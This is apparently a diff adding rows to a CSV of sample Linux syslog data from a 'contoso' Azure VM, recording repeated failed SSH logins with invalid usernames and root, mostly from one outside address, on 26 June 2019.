+3450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:19:40,UbuntuDevEnv,2019-06-26 12:19:40,auth,UbuntuDevEnv,info,Failed password for invalid user dbuser from 27.106.45.6 port 52260 ssh2,109817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dbuser,27.106.45.6,52260,,
+3451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:19:40,UbuntuDevEnv,2019-06-26 12:19:40,auth,UbuntuDevEnv,info,Disconnected from invalid user dbuser 27.106.45.6 port 52260 [preauth],109817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dbuser,27.106.45.6,52260,,
+3452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:19:40,UbuntuDevEnv,2019-06-26 12:19:40,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 52260:11: Bye Bye [preauth],109817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,52260,,
+3453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:24:24,UbuntuDevEnv,2019-06-26 12:24:23,auth,UbuntuDevEnv,info,Connection closed by 45.56.136.32 port 57606 [preauth],111175,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.56.136.3,57606,,
+3454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:24:53,UbuntuDevEnv,2019-06-26 12:24:52,auth,UbuntuDevEnv,info,Invalid user augusto from 27.106.45.6 port 49316,111301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,augusto,27.106.45.6,49316,,
+3455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:24:53,UbuntuDevEnv,2019-06-26 12:24:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,111301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:24:53,UbuntuDevEnv,2019-06-26 12:24:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,111301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:24:55,UbuntuDevEnv,2019-06-26 12:24:54,auth,UbuntuDevEnv,info,Failed password for invalid user augusto from 27.106.45.6 port 49316 ssh2,111301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,augusto,27.106.45.6,49316,,
+3458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:24:55,UbuntuDevEnv,2019-06-26 12:24:54,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 49316:11: Bye Bye [preauth],111301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,49316,,
+3459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:24:55,UbuntuDevEnv,2019-06-26 12:24:54,auth,UbuntuDevEnv,info,Disconnected from invalid user augusto 27.106.45.6 port 49316 [preauth],111301,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,augusto,27.106.45.6,49316,,
+3460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:25:42,UbuntuDevEnv,2019-06-26 12:25:42,auth,UbuntuDevEnv,info,Disconnected from 138.197.167.5 port 41076 [preauth],111482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.197.167.5,41076,,
+3461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:25:42,UbuntuDevEnv,2019-06-26 12:25:42,auth,UbuntuDevEnv,info,Received disconnect from 138.197.167.5 port 41076:11: Bye Bye [preauth],111482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.197.167.5,41076,,
+3462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:26:32,UbuntuDevEnv,2019-06-26 12:26:31,auth,UbuntuDevEnv,info,Invalid user vali from 27.106.45.6 port 57749,111656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vali,27.106.45.6,57749,,
+3463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:26:32,UbuntuDevEnv,2019-06-26 12:26:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,111656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:26:32,UbuntuDevEnv,2019-06-26 12:26:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,111656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:26:34,UbuntuDevEnv,2019-06-26 12:26:34,auth,UbuntuDevEnv,info,Failed password for invalid user vali from 27.106.45.6 port 57749 ssh2,111656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vali,27.106.45.6,57749,,
+3466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:26:34,UbuntuDevEnv,2019-06-26 12:26:34,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 57749:11: Bye Bye [preauth],111656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,57749,,
+3467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:26:34,UbuntuDevEnv,2019-06-26 12:26:34,auth,UbuntuDevEnv,info,Disconnected from invalid user vali 27.106.45.6 port 57749 [preauth],111656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vali,27.106.45.6,57749,,
+3468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:26:49,UbuntuDevEnv,2019-06-26 12:26:48,auth,UbuntuDevEnv,info,Received disconnect from 167.99.190.30 port 37594:11: Bye Bye [preauth],111717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,167.99.190.3,37594,,
+3469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:26:49,UbuntuDevEnv,2019-06-26 12:26:48,auth,UbuntuDevEnv,info,Disconnected from 167.99.190.30 port 37594 [preauth],111717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,167.99.190.3,37594,,
+3470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:33:34,UbuntuDevEnv,2019-06-26 12:33:34,auth,UbuntuDevEnv,info,Invalid user radio from 27.106.45.6 port 35011,113236,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,27.106.45.6,35011,,
+3471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:33:34,UbuntuDevEnv,2019-06-26 12:33:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,113236,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:33:34,UbuntuDevEnv,2019-06-26 12:33:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,113236,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:33:36,UbuntuDevEnv,2019-06-26 12:33:36,auth,UbuntuDevEnv,info,Failed password for invalid user radio from 27.106.45.6 port 35011 ssh2,113236,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,27.106.45.6,35011,,
+3474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:33:37,UbuntuDevEnv,2019-06-26 12:33:36,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 35011:11: Bye Bye [preauth],113236,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,35011,,
+3475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:33:37,UbuntuDevEnv,2019-06-26 12:33:36,auth,UbuntuDevEnv,info,Disconnected from invalid user radio 27.106.45.6 port 35011 [preauth],113236,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,27.106.45.6,35011,,
+3476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:35:19,UbuntuDevEnv,2019-06-26 12:35:18,auth,UbuntuDevEnv,info,Invalid user gmmisdt from 27.106.45.6 port 43437,113604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmmisdt,27.106.45.6,43437,,
+3477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:35:19,UbuntuDevEnv,2019-06-26 12:35:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,113604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:35:19,UbuntuDevEnv,2019-06-26 12:35:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,113604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:35:20,UbuntuDevEnv,2019-06-26 12:35:20,auth,UbuntuDevEnv,info,Failed password for invalid user gmmisdt from 27.106.45.6 port 43437 ssh2,113604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmmisdt,27.106.45.6,43437,,
+3480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:35:20,UbuntuDevEnv,2019-06-26 12:35:20,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 43437:11: Bye Bye [preauth],113604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,43437,,
+3481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:35:20,UbuntuDevEnv,2019-06-26 12:35:20,auth,UbuntuDevEnv,info,Disconnected from invalid user gmmisdt 27.106.45.6 port 43437 [preauth],113604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmmisdt,27.106.45.6,43437,,
+3482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:37:02,UbuntuDevEnv,2019-06-26 12:37:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6  user=root,113978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,27.106.45.6,,0,
+3483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:37:04,UbuntuDevEnv,2019-06-26 12:37:04,auth,UbuntuDevEnv,info,Failed password for root from 27.106.45.6 port 51874 ssh2,113978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,51874,,
+3484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:37:04,UbuntuDevEnv,2019-06-26 12:37:04,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 51874:11: Bye Bye [preauth],113978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,51874,,
+3485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:37:04,UbuntuDevEnv,2019-06-26 12:37:04,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 27.106.45.6 port 51874 [preauth],113978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,27.106.45.6,51874,,
+3486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:38:41,UbuntuDevEnv,2019-06-26 12:38:41,auth,UbuntuDevEnv,info,Invalid user mrx from 27.106.45.6 port 60294,114331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mrx,27.106.45.6,60294,,
+3487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:38:41,UbuntuDevEnv,2019-06-26 12:38:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,114331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:38:41,UbuntuDevEnv,2019-06-26 12:38:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,114331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:38:43,UbuntuDevEnv,2019-06-26 12:38:43,auth,UbuntuDevEnv,info,Failed password for invalid user mrx from 27.106.45.6 port 60294 ssh2,114331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mrx,27.106.45.6,60294,,
+3490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:38:43,UbuntuDevEnv,2019-06-26 12:38:43,auth,UbuntuDevEnv,info,Disconnected from invalid user mrx 27.106.45.6 port 60294 [preauth],114331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mrx,27.106.45.6,60294,,
+3491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:38:43,UbuntuDevEnv,2019-06-26 12:38:43,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 60294:11: Bye Bye [preauth],114331,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,60294,,
+3492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:40:24,UbuntuDevEnv,2019-06-26 12:40:23,auth,UbuntuDevEnv,info,Invalid user b from 27.106.45.6 port 40492,114685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,b,27.106.45.6,40492,,
+3493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:40:24,UbuntuDevEnv,2019-06-26 12:40:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,114685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:40:24,UbuntuDevEnv,2019-06-26 12:40:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,114685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:40:26,UbuntuDevEnv,2019-06-26 12:40:25,auth,UbuntuDevEnv,info,Failed password for invalid user b from 27.106.45.6 port 40492 ssh2,114685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,b,27.106.45.6,40492,,
+3496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:40:26,UbuntuDevEnv,2019-06-26 12:40:26,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 40492:11: Bye Bye [preauth],114685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,40492,,
+3497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:40:26,UbuntuDevEnv,2019-06-26 12:40:26,auth,UbuntuDevEnv,info,Disconnected from invalid user b 27.106.45.6 port 40492 [preauth],114685,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,b,27.106.45.6,40492,,
+3498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:07,UbuntuDevEnv,2019-06-26 12:42:07,auth,UbuntuDevEnv,info,Invalid user apache from 27.106.45.6 port 48926,115050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,27.106.45.6,48926,,
+3499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:07,UbuntuDevEnv,2019-06-26 12:42:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=27.106.45.6,115050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,27.106.45.6,,0,
+3500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:07,UbuntuDevEnv,2019-06-26 12:42:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:09,UbuntuDevEnv,2019-06-26 12:42:09,auth,UbuntuDevEnv,info,Failed password for invalid user apache from 27.106.45.6 port 48926 ssh2,115050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,27.106.45.6,48926,,
+3502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:09,UbuntuDevEnv,2019-06-26 12:42:09,auth,UbuntuDevEnv,info,Disconnected from invalid user apache 27.106.45.6 port 48926 [preauth],115050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,27.106.45.6,48926,,
+3503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:09,UbuntuDevEnv,2019-06-26 12:42:09,auth,UbuntuDevEnv,info,Received disconnect from 27.106.45.6 port 48926:11: Bye Bye [preauth],115050,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,27.106.45.6,48926,,
+3504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:51,UbuntuDevEnv,2019-06-26 12:42:51,auth,UbuntuDevEnv,info,Invalid user kou from 194.228.3.191 port 51969,115203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kou,194.228.3.1,51969,,
+3505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:51,UbuntuDevEnv,2019-06-26 12:42:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,115203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:51,UbuntuDevEnv,2019-06-26 12:42:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,115203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:54,UbuntuDevEnv,2019-06-26 12:42:53,auth,UbuntuDevEnv,info,Failed password for invalid user kou from 194.228.3.191 port 51969 ssh2,115203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kou,194.228.3.1,51969,,
+3508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:54,UbuntuDevEnv,2019-06-26 12:42:53,auth,UbuntuDevEnv,info,Disconnected from invalid user kou 194.228.3.191 port 51969 [preauth],115203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kou,194.228.3.1,51969,,
+3509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 12:42:54,UbuntuDevEnv,2019-06-26 12:42:53,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 51969:11: Bye Bye [preauth],115203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,51969,,
